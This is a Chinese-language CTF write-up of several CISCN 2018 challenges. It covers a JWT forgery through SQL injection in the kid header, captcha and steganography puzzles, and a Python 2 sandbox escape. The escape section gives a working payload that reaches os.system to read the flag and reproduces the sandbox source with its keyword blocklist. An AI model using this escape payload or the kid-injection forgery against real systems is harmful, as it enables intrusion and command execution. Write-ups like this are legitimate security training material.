全部赛题:https://github.com/findneo/ctfgodown/tree/master/ciscn2018

WEB

easyweb

http://114.116.26.217/

学习了一点 json web token ,但是没想到是个脑洞。(应该只是非预期解)

账户admin,空密码登陆。

ciscn{2a36b5f78a1d6a107212d82ee133c421}

1525025826358

1525025838819

有师傅在群里说HMAC的密钥放在数据库里,而kid是个注入点,可以通过联合查询控制查询结果,然后伪造签名。

从开始做到赛后试着复现都一直纠结alg 是sha256的问题,以为密钥是用来加盐,然后就自己胡乱加盐,陷入困境。后来仔细了解了一下,HMAC就算是一个比较复杂的加盐算法吧,自己加没啥意思,而且jwt也不支持纯粹sha256。

事实证明把sha256改成HS256就好了。这里有两种可能,一是后端写死算法为HS256,然后header里面写成了sha256,二是算法根据alg 的值确定,我们传入HS256所以按照HS256来计算。

经过测试发现后端甚至根本不在乎有没alg ,,,,所以说做题思路还是要灵活一些。

kid的值随意传,奇怪一点就行,只要让它查询不出结果,那么我们联合查询的值就会作为最后的密钥。

1525357037490

参考:

MISC

验证码

本题目为验证码破解,选手需在指定时间完成对验证码的破解,成功后获取Flag。请使用队伍token进行登陆。
参考数据:https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8

https://game.captcha.qq.com/hslj/html/hslj/

题目有点问题,手动玩了一会儿。

ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}

1524887059191

后来换成输验证码得flag了。

1525027778352

picture

请从图中找出密码。

附件下载

binwalk -e 分离得到 97E497E4.zlib 两个文件,后者是前者的 zlib 压缩文件。

1
2
3
import zlib
print zlib.decompress(open('97E4.zlib','rb').read())==open('97E4','rb').read()
# got True

文件97E4 内容的base64解码后稍做处理是一个加密的压缩包。

1
2
3
4
5
6
7
8
import base64
t=open('97E4','rb').read()
m=base64.b64decode(t).encode("hex")
n=''
for i in range(len(m)/4):
n+=m[i*4+2:i*4+4]+m[i*4:i*4+2]
print n
# 504b040300140001000030904c97542e7f25005a0000004e0000000400006f6365647ab0d6a3f3bbc8060511ce0c8b62793d8d39caf2b644325509c991cb202dc981e60ea354ca8de79f3bc187f6719f4738adf24fa3ca2d9d7b8adda175d833d1c0264225c62d86784977cf5973989ea77ddbbf31060aef47124fca4b500201003f00140001000030904c97542e7f25005a0000004e00000004002400000000000000200000000000006f636564000a002000000000000100189800e452da8501d3bcf6ace5da8701d3bcf6ace5da8701d34b500605000000000001000100560000007c000000dc505b74796f68206e2e325d370a0d3e3e203e7da87da87da80a0d0a0d7254636162656361206b6d28736f207465726563746e63206c61206c616c74733a290a0d20206946656c2220703c737965686c6c3023223e202c696c656e3120202c6e693c206f6d7564656c0d3e200a2020a820a87da87d0d7d5a0a7265446f766973696f69456e7272726f203a7da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da87da83c20202d617073736f7764723b200d293e0a3e3e0020

大致内容如下:

1525026681311

对比得到密码: integer division or modulo by zero

1525026721625

得到一串编码后字符:

1525026922897

解码得到 CISCN{C16E6F6E065DA0306E318D095C68BDC0}

1525026880755

run

参考链接:

1
2
3
payload:
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}

1525027473718

顺便dump下来几个文件

1525027583658

cpython.py

1
2
3
4
5
6
7
8
9
10
from ctypes import pythonapi,POINTER,py_object

_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]

del pythonapi,POINTER,py_object

def get_dict(ob):
return _get_dict(ob).contents.value

sandbox.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-04-09 23:30:58
# @Author : Xu (you@example.org)
# @Link : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict
from types import FunctionType

main = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__

def delete_type():
type_dict = get_dict(type)
del type_dict['__bases__']
del type_dict['__subclasses__']

def delete_func_code():
func_dict = get_dict(FunctionType)
del func_dict['func_code']

def safe_import(__import__,whiteList):
def importer(name,globals={},locals={},fromlist=[],level=-1):
if name in whiteList:
return __import__(name,globals,locals,fromlist,level)
else:
print "HAHA,[%s] has been banned~" % name
return importer

class ReadOnly(dict):
"""docstring for ReadOnlu"""
def __delitem__(self,keys):
raise ValueError(":(")
def pop(self,key,default=None):
raise ValueError(":(")
def popitem(self):
raise ValueError(":(")
def setdefault(self,key,value):
raise ValueError(":(")
def __setitem__(self,key,value):
raise ValueError(":(")
def __setattr__(self, name, value):
raise ValueError(":(")
def update(self,dict,**kwargs):
raise ValueError(":(")

def builtins_clear():
whiteList = "raw_input SyntaxError ValueError NameError Exception __import__".split(" ")
for mod in __builtins__.__dict__.keys():
if mod not in whiteList:
del __builtins__.__dict__[mod]

def input_filter(string):
ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
for i in ban:
if i in string.lower():
print "{} has been banned!".format(i)
return ""
return string

# delete_type();
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins

del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
____
| _ \ _ _ _ __
| |_) | | | | '_ \
| _ <| |_| | | | |
|_| \_\\__,_|_| |_|


Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
inp = raw_input('>>>')
cmd = input_filter(inp)
try:
exec cmd
except NameError, e:
print "wow something lose!We can\'t find it ! D:"
except SyntaxError,e:
print "Noob! Synax Wrong! :("
except Exception,e:
print "unknow error,try again :>"

/home/ctf/bin

1525027843540

题目备份

https://github.com/findneo/ctfgodown/tree/master/ciscn2018